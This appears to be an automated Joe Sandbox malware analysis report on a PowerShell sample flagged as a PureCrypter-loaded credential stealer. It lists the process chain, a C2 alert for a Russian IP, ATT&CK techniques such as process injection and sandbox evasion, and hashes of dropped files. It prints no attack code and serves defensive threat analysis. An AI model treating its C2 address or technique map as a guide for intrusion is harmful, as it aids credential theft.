Windows
Analysis Report
92.255.57.112.ps1
Overview
General Information
Detection
Score: | 88 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- powershell.exe (PID: 4088 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -noLogo -E xecutionPo licy unres tricted -f ile "C:\Us ers\user\D esktop\92. 255.57.112 .ps1" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6528 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - RegSvcs.exe (PID: 5796 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Reg Svcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
PureCrypter | According to zscaler, PureCrypter is a fully-featured loader being sold since at least March 2021The malware has been observed distributing a variety of remote access trojans and information stealersThe loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus software productsPureCrypter features provide persistence, injection and defense mechanisms that are configurable in Googles Protocol Buffer message format | No Attribution |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-15T08:24:16.293498+0100 | 2035595 | 1 | Domain Observed Used for C2 Detected | 92.255.57.112 | 56001 | 192.168.2.5 | 49706 | TCP |
Click to jump to signature section
AV Detection |
---|
Source: | Integrated Neural Analysis Model: |
Source: | Binary string: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Networking |
---|
Source: | Suricata IDS: |
Source: | TCP traffic: |
Source: | ASN Name: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Window created: | Jump to behavior |
Source: | Code function: | 0_2_00007FF848F35180 | |
Source: | Code function: | 0_2_00007FF848F361B9 | |
Source: | Code function: | 0_2_00007FF849000F9C | |
Source: | Code function: | 3_2_010537F7 | |
Source: | Code function: | 3_2_0673237F | |
Source: | Code function: | 3_2_06730040 | |
Source: | Code function: | 3_2_06732454 | |
Source: | Code function: | 3_2_06732388 | |
Source: | Code function: | 3_2_06730007 | |
Source: | Code function: | 3_2_06731E37 | |
Source: | Code function: | 3_2_06731E2E | |
Source: | Code function: | 3_2_06731F25 |
Source: | Classification label: |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | WMI Queries: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Binary string: |
Source: | Code function: | 0_2_00007FF848F34C0D | |
Source: | Code function: | 0_2_00007FF848F3BC8D | |
Source: | Code function: | 0_2_00007FF848F300C1 | |
Source: | Code function: | 0_2_00007FF848F3A8DD |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | WMI Queries: |
Source: | WMI Queries: |
Source: | WMI Queries: |
Source: | WMI Queries: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | WMI Queries: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process token adjusted: | Jump to behavior |
Source: | Memory allocated: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | String found in binary or memory: |
Source: | Memory written: | Jump to behavior |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior |
Source: | Process created: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | WMI Queries: |
Stealing of Sensitive Information |
---|
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Key opened: | Jump to behavior |
Source: | File source: | ||
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 321 Windows Management Instrumentation | 1 DLL Side-Loading | 212 Process Injection | 1 Disable or Modify Tools | OS Credential Dumping | 421 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 PowerShell | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 331 Virtualization/Sandbox Evasion | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 212 Process Injection | Security Account Manager | 331 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Clipboard Data | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 213 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
7% | Virustotal | Browse | ||
3% | ReversingLabs |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
92.255.57.112 | unknown | Russian Federation | 42253 | TELSPRU | true |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1591628 |
Start date and time: | 2025-01-15 08:23:09 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 7m 14s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 6 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 92.255.57.112.ps1 |
Detection: | MAL |
Classification: | mal88.spyw.evad.winPS1@4/7@0/1 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
- Excluded IPs from analysis (whitelisted): 199.232.210.172, 13.107.246.45, 4.245.163.56, 172.202.163.200
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target RegSvcs.exe, PID 5796 because it is empty
- Execution Graph export aborted for target powershell.exe, PID 4088 because it is empty
- Not all processes where analyzed, report is missing behavior information
- Report size getting too big, too many NtOpenFile calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description |
---|---|---|
02:24:08 | API Interceptor | |
02:24:16 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
92.255.57.112 | Get hash | malicious | XWorm | Browse | ||
Get hash | malicious | XWorm | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
bg.microsoft.map.fastly.net | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Wannacry | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Wannacry | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Wannacry | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
TELSPRU | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | XWorm | Browse |
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 328 |
Entropy (8bit): | 3.240186510507009 |
Encrypted: | false |
SSDEEP: | 6:kKeG3D9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:9qDImsLNkPlE99SNxAhUe/3 |
MD5: | 86CDA0433DC2F94246C6559541A60A3A |
SHA1: | DE75B370CDEA48B05C26BDEC3BBBD79A5DA2A95D |
SHA-256: | A7795E4E30D6C5BF0D93B694A87D33808E416219D67B07E303A19557632724D7 |
SHA-512: | 4B361218A8DD70D5035A79D7F51A157DF53D7A19C42112E11BA6D97BCCFBECDCCE7B516F1B1EB5105CE9D69BB928A7F010C7A18B1E33591ADBD6C1F6A621AEFB |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:NlllulDm0ll//Z:NllU6cl/ |
MD5: | DA1F22117B9766A1F0220503765A5BA5 |
SHA1: | D35597157EFE03AA1A88C1834DF8040B3DD3F3CB |
SHA-256: | BD022BFCBE39B4DA088DDE302258AE375AAFD6BDA4C7B39A97D80C8F92981C69 |
SHA-512: | 520FA7879AB2A00C86D9982BB057E7D5E243F7FC15A12BA1C823901DC582D2444C76534E955413B0310B9EBD043400907FD412B88927DAD07A1278D3B667E3D9 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6222 |
Entropy (8bit): | 3.700832262998266 |
Encrypted: | false |
SSDEEP: | 48:GCgFnQBaCSbU2K+LPukvhkvklCywnn2AtoclzVSogZoegtoclcRVSogZoa1:hg92aCvoCkvhkvCCtLtociHktocC6HF |
MD5: | 69B0B6B20E3CD7081EAD8FC2D0B1CE0A |
SHA1: | 66DAA9BC61D1E15BC8FAE78FF1CDA596FD61F7C1 |
SHA-256: | DFD93D05F927E6A5287EF3331725A81504BAA5822A9D786F12FD173A0961141A |
SHA-512: | 9C35672C7D72C5307188380540DD4A7869041EFC5B4022F254A4CC5B832B0D48EEB60EAB0D839C7BD00AFE481E448EA247376F30DAEE14DB7506FBC8DC493600 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JCZQKXY5ZQZRQ57IWPWJ.temp
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6222 |
Entropy (8bit): | 3.700832262998266 |
Encrypted: | false |
SSDEEP: | 48:GCgFnQBaCSbU2K+LPukvhkvklCywnn2AtoclzVSogZoegtoclcRVSogZoa1:hg92aCvoCkvhkvCCtLtociHktocC6HF |
MD5: | 69B0B6B20E3CD7081EAD8FC2D0B1CE0A |
SHA1: | 66DAA9BC61D1E15BC8FAE78FF1CDA596FD61F7C1 |
